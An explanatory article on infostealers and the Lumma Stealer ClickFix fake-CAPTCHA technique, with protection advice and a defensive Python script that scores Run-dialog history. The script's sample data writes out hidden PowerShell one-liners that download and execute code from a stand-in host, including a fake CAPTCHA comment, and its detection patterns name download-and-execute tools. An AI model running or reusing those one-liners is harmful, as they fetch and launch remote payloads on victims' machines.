Infostealers: the new trend in cybercrime
Infostealers are a growing cyber threat aimed at stealing personal data, passwords, and other sensitive information. This article answers frequently asked questions, explains the principle of infostealers, and provides key recommendations for protection.
Imagine you're browsing the internet and come across a premium program offered for free download. You enthusiastically download it, launch it, and congratulate yourself on the money saved. But the "free" program was an infostealer planted by an attacker, and while you think you're getting something for nothing, the attacker is already quietly searching your computer and stealing your data.
Infostealers are a type of spyware. They are designed to stay as stealthy as possible while collecting sensitive information and sending it to attackers. They often spread through channels that look trustworthy:
- infected links and email attachments;
- fake software download sites;
- fraudulent websites.
Infostealers exist for all major operating systems, both on mobile devices (Android, iOS) and on computers (Windows, Linux, macOS). The threat is therefore very real for every user.

What information does an infostealer collect?
Infostealers operate covertly and are challenging to detect. We wouldn't be far off the mark if we said they can steal almost anything. The most commonly collected data include:
- Login credentials: names, passwords, cookies, and stored login tokens from web browsers.
- Payment details: credit card numbers, CVV/CVC codes, banking logins.
- Personal data: email addresses, phone numbers, postal addresses, and files such as text documents and saved emails.
- System information: operating system version, list of installed applications, and network configuration.
- Application data: messages from communication platforms, access keys to corporate accounts, or encryption keys.
How does an infostealer work?
The primary goal of infostealers is to steal data. However, they can also do several other things. For example, an infostealer may allow an attacker to:
- record keystrokes (keylogging), which reveals not only passwords but also the content of messages;
- use your device's processing power to mine cryptocurrency or to take part in attacks as a member of a botnet;
- display unsolicited advertising and redirect you to malicious sites (adware);
- remotely control the computer and keep persistent access to your system (a backdoor, for example a Remote Access Trojan);
- take screenshots to capture sensitive information from applications or websites.
The most widely used infostealer of all time?
Lumma Stealer is one of the most active infostealers currently in circulation. It spreads through various channels, including fake CAPTCHA pages used in the ClickFix campaign. These pages trick users into running a command that downloads malicious code onto their device. The malware masquerades as legitimate software and can evade antivirus detection. Once it has infected the system, it scans files and sends sensitive data to the attackers.
The image below illustrates one of the techniques used by Lumma Stealer: a fake CAPTCHA page that silently copies malicious PowerShell code to the victim's clipboard. The user is then instructed to open the Run dialog (Win + R), paste the code (Ctrl + V), and press Enter, unknowingly launching the attack themselves. Because the victim types the command, no malicious attachment or download has to get past email or download scanning, and once the command runs it can fetch the stealer and exfiltrate sensitive data directly from the infected device.
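The Win + R step leaves a trace a responder can check: Windows records what the user typed into the Run dialog in the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (one value per entry, each stored with a trailing `\1`). The script below is an added example written for this article, not code from the original page or from any of the cited sources; it scores such entries for the combination of traits a ClickFix one-liner shows (a PowerShell launcher, a hidden window, a download-and-execute chain, a base64 `-EncodedCommand` payload, and a reassuring "I am not a robot" comment). The indicator list, the weights, the threshold, and the sample RunMRU values are all assumptions constructed for the example; the `-EncodedCommand` decoding relies on PowerShell's documented base64-of-UTF-16LE format.

```python
"""Triage Run-dialog (RunMRU) history for ClickFix-style PowerShell one-liners.

Added example for this article, not the article's or any vendor's own code.
The indicators and weights are assumptions drawn from the technique described
above; tune them for your own environment.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# (name, pattern, weight). One hit alone means little (every admin runs cmd);
# the combination hidden window + download + eval is what marks a ClickFix lure.
INDICATORS = [
    ("launcher",      re.compile(r"^\s*(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I), 1),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), 2),
    ("exec_policy",   re.compile(r"-e(xecutionpolicy|p)\s+bypass\b", re.I), 1),
    ("encoded",       re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("download",      re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|curl)\b", re.I), 2),
    ("eval",          re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 3),
    ("remote_url",    re.compile(r"https?://", re.I), 1),
    # Lure text appended as a PowerShell comment so the Run box looks harmless
    # (assumption based on how the fake CAPTCHA instruction is presented).
    ("captcha_lure",  re.compile(r"#.*(robot|captcha|verif)", re.I), 3),
]
THRESHOLD = 5  # assumption: score at or above this is worth a human look


@dataclass
class Verdict:
    command: str
    score: int
    hits: List[str] = field(default_factory=list)
    decoded: Optional[str] = None  # payload recovered from -EncodedCommand, if any


def decode_encoded(cmd: str) -> Optional[str]:
    """PowerShell's -EncodedCommand carries base64 of the script as UTF-16LE."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmd: str) -> Verdict:
    """Scan the command and, if present, its decoded payload; count each indicator once."""
    decoded = decode_encoded(cmd)
    text = cmd if decoded is None else f"{cmd}\n{decoded}"
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return Verdict(cmd, score, hits, decoded)


def strip_runmru(value: str) -> str:
    """RunMRU stores each entry as '<command>\\1'; drop the suffix."""
    return value[:-2] if value.endswith("\\1") else value


def triage(runmru_values: List[str]) -> List[Verdict]:
    """Return the entries that reach THRESHOLD, highest score first."""
    verdicts = [score_command(strip_runmru(v)) for v in runmru_values]
    return sorted((v for v in verdicts if v.score >= THRESHOLD), key=lambda v: -v.score)


# --- constructed sample RunMRU values (not real telemetry) -------------------
_ENCODED = base64.b64encode("iex (irm https://example.invalid/p)".encode("utf-16-le")).decode()
SAMPLE_RUNMRU = [
    "notepad\\1",
    "cmd /c ipconfig /all\\1",
    'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/v)" '
    "# I am not a robot - reCAPTCHA Verification ID: 4821\\1",
    f"powershell -enc {_ENCODED}\\1",
]

if __name__ == "__main__":
    for v in triage(SAMPLE_RUNMRU):
        print(f"[{v.score:>2}] {v.command}")
        print("     hits:", ", ".join(v.hits))
        if v.decoded:
            print("     decoded:", v.decoded)
```

On a live machine you would feed `triage()` the values read from the RunMRU key (for example with PowerShell's `Get-ItemProperty` on that path, exported to a file), and pair the result with process-creation telemetry showing powershell.exe started by explorer.exe, which is what the Run dialog produces. The decoding step matters: a lure that hides everything behind `-enc` scores almost nothing on the raw string but reveals the download-and-execute chain once the payload is decoded.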
Infostealer, making history?
Recent incidents published by HudsonRock show the profound impact of infostealer infections:
- Infostealer infections: Reached 27.5 million incidents, triple that of the largest botnets, such as Necurs, with 9 million infections.
- Attack on the healthcare sector: A single compromised Citrix account led to a ransom of $22 million.
What are the symptoms of infostealer on the device?
Infostealers work subtly, and their detection is not straightforward. However, specific signals may indicate an infection:
- Unusual logins: services such as Google, Microsoft, or university systems may alert you to login attempts from an unknown location.
- Changes to account settings: you've received a notification about a password change.
- Suspicious system activity: you notice higher system utilization (CPU or memory usage), windows that briefly pop up and disappear again, or messages sent from your accounts that you did not write.
Do you suspect an infostealer and want to remove it? Follow our guide.
How to protect yourself?
First and foremost, be cautious: don't log in on suspicious sites, don't click on links indiscriminately, and always check the authenticity of login prompts. Then use proven security tools and measures to minimize the risk of credential theft:
Password Manager
Stores and encrypts login credentials, generates unique passwords, and protects them with a master password. The main advantage is that a password manager encrypts the stored data end-to-end, so even the service provider cannot read it. Note that this protects the vault on the provider's servers and in transit; an infostealer running on a device where the vault is unlocked can still read what the app or browser extension decrypts, which is why keeping the device itself clean matters.
Long-term protection
Keep your system secure with regular updates, use a reliable antivirus (such as Windows Defender integrated into Windows or ESET for broader protection), and monitor for suspicious activity such as unusual logins or unauthorized account changes.
Multi-factor authentication
Prevents unauthorized access even if a password leaks. If an attacker obtains your password but not the second factor (such as a code from an authenticator app, an SMS code, or a hardware key), they cannot log in. Keep in mind that infostealers also steal browser cookies and session tokens, which let an attacker reuse an already authenticated session without passing MFA; after cleaning an infected device, sign out of all sessions and revoke active tokens for important accounts as well as changing passwords.
Watch out for a master password leak! If an attacker discovers the master password for your password manager, they gain access to every stored password. First, make sure your device is not infected with malware such as an infostealer: perform a thorough scan and clean the system. Only then change the passwords for key services (email, banking, social networks) and set a new, strong master password. Finally, enable MFA on the account (or have the administrator enable it) so that an attacker holding the password cannot take it over.
Conclusion
Infostealers are a silent but perilous threat that can lead to serious security incidents. Prevention is key: use a password manager, avoid suspicious files, and open links cautiously. Remember that no operating system is entirely immune to infection, so updating software and taking security precautions regularly is essential. The fact that infostealers are a current threat is confirmed by a warning from Masaryk University's cybersecurity team, which you can read here.
Resources
- https://www.infostealers.com/article/botnets-are-dead-long-live-infostealers-a-comparison/
- https://www.infostealers.com/article/what-are-info-stealers/
- https://objective-see.org/blog/blog_0x7D.html
- https://www.eset.com/cz/spyware/
- https://www.eset.com/cz/infostealer/
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma